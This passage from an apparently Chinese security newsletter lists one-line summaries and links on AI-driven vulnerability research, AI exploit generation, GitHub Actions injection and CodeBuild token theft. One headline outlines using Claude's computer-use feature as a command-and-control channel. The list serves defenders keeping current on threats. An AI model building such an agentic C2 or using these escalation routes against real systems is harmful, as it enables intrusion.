href="https://aws.amazon.com/blogs/security/inside-aws-security-agent-a-multi-agent-architecture-for-automated-penetration-testing/" target="_blank">https://aws.amazon.com/blogs/security/inside-aws-security-agent-a-multi-agent-architecture-for-automated-penetration-testing/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RSAC 2026 讨论代理安全架构分歧及秒级突破下的自动化检测响应</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.defendersinitiative.com/p/i-watched-all-11-main-stage-keynotes" target="_blank">https://www.defendersinitiative.com/p/i-watched-all-11-main-stage-keynotes</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">yara-rule-skill：YARAHQ 推出 yara-rule-skill AI 助手，辅助编写与优化 YARA 检测规则</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/YARAHQ/yara-rule-skill" target="_blank">https://github.com/YARAHQ/yara-rule-skill</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">利用 Claude 截图定位元素下发指令，构建 API Key 不落端点的 C2 架构</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.beyondtrust.com/blog/entry/claude-control-agentic-c2-computer-use-agent" target="_blank">https://www.beyondtrust.com/blog/entry/claude-control-agentic-c2-computer-use-agent</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenAI 发布 GPT-5.4-Cyber，经防御性安全微调，扩大可信访问项目</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://openai.com/index/scaling-trusted-access-for-cyber-defense/" target="_blank">https://openai.com/index/scaling-trusted-access-for-cyber-defense/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Datadoghq分享使用LLM大规模检测恶意Pull Request的经验教训</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.datadoghq.com/blog/engineering/malicious-pull-requests/" target="_blank">https://www.datadoghq.com/blog/engineering/malicious-pull-requests/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CSA提出10个问题，用于评估组织在AI漏洞风暴中的安全计划状态</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.cloudsecurityalliance.org/mythos-ciso" target="_blank">https://labs.cloudsecurityalliance.org/mythos-ciso</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Sonrai Security 发布 AWS 组织 AI 治理方案，通过 SCP 策略和 API 密钥控制实现防护</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://sonraisecurity.com/enforcing-ai-governance-across-aws-orgs/" target="_blank">https://sonraisecurity.com/enforcing-ai-governance-across-aws-orgs/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析LLM在漏洞研究中的应用，探讨其通过组合已知原语发现新型漏洞的能力</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://devansh.bearblog.dev/on-llms-and-vuln-research/" target="_blank">https://devansh.bearblog.dev/on-llms-and-vuln-research/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI 编码代理将改变漏洞研究经济，通过指向源码树即可发现零日漏洞，从 Chrome 到数据库和打印机等目标</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/" target="_blank">https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Nicholas Carlini 讨论使用 Claude 进行漏洞研究，涉及 LLM 发现的 0-day 风险评估与缓解</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/" target="_blank">https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Anthropic推出Glasswing项目，Claude Mythos模型已发现数千高危漏洞，覆盖所有主流操作系统和浏览器</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.anthropic.com/glasswing" target="_blank">https://www.anthropic.com/glasswing</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Claude Mythos Preview 模型可自主编写浏览器漏洞利用链，实现沙箱逃逸和本地提权，还能逆向闭源软件并利用 N-day 漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://red.anthropic.com/2026/mythos-preview/" target="_blank">https://red.anthropic.com/2026/mythos-preview/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GitHub发布100多个AI代理工作流，用于自动化代码库问题处理、代码重构和积压任务清理</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.blog/ai-and-ml/automate-repository-tasks-with-github-agentic-workflows/" target="_blank">https://github.blog/ai-and-ml/automate-repository-tasks-with-github-agentic-workflows/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">工具集成NOVA框架对抗提示检测能力，扫描AI代理输入输出中的指令覆盖、角色扮演越狱、编码混淆和上下文操纵攻击</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.securitybreak.io/coding-agents-the-insider-threat-you-installed-yourself-35644a1d5409" target="_blank">https://blog.securitybreak.io/coding-agents-the-insider-threat-you-installed-yourself-35644a1d5409</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OWOWASP发布AI测试指南，提供AI系统安全评估框架和方法论</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/OWASP/www-project-ai-testing-guide" target="_blank">https://github.com/OWASP/www-project-ai-testing-guide</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI代理在2849个智能合约中发现2个零日漏洞并生成价值3694美元的利用代码，GPT-5的API成本为3476美元</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://red.anthropic.com/2025/smart-contracts/" target="_blank">https://red.anthropic.com/2025/smart-contracts/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AWS re:Invent 2025将举办AI安全会议，涵盖AI工作负载防护、智能体系统安全及AI在安全运营中的应用，包括生成式AI应用红队演练和AI代理身份验证实现</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://aws.amazon.com/blogs/security/aws-reinvent-2025-your-guide-to-security-sessions-across-four-transformative-themes/" target="_blank">https://aws.amazon.com/blogs/security/aws-reinvent-2025-your-guide-to-security-sessions-across-four-transformative-themes/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Qualys 提出从静态配置文件转向 AI 驱动的扫描优化，以应对大规模应用安全测试挑战</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.qualys.com/product-tech" target="_blank">https://blog.qualys.com/product-tech</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">npm-security-best-practices：GitHub 仓库收集 npm 安全最佳实践，包含依赖管理、CI/CD 安全配置和供应链防护指南</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/lirantal/npm-security-best-practices" target="_blank">https://github.com/lirantal/npm-security-best-practices</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AWS CodeBuild 可提取 CodeConnections 高权 Token，控制组织所有代码库</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/" target="_blank">https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">剖析 GitHub Actions 危险触发器与脚本注入机制，演示第三方操作供应链投毒攻击链</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.wiz.io/blog/github-actions-security-threat-model-and-defenses" target="_blank">https://www.wiz.io/blog/github-actions-security-threat-model-and-defenses</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">MITRE Fight Fraud Framework：MITRE发布F3框架，定义金融欺诈战术及ATT&amp;CK映射</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://ctid.mitre.org/fraud" target="_blank">https://ctid.mitre.org/fraud</a></span></p></div></div></div><div style="display: 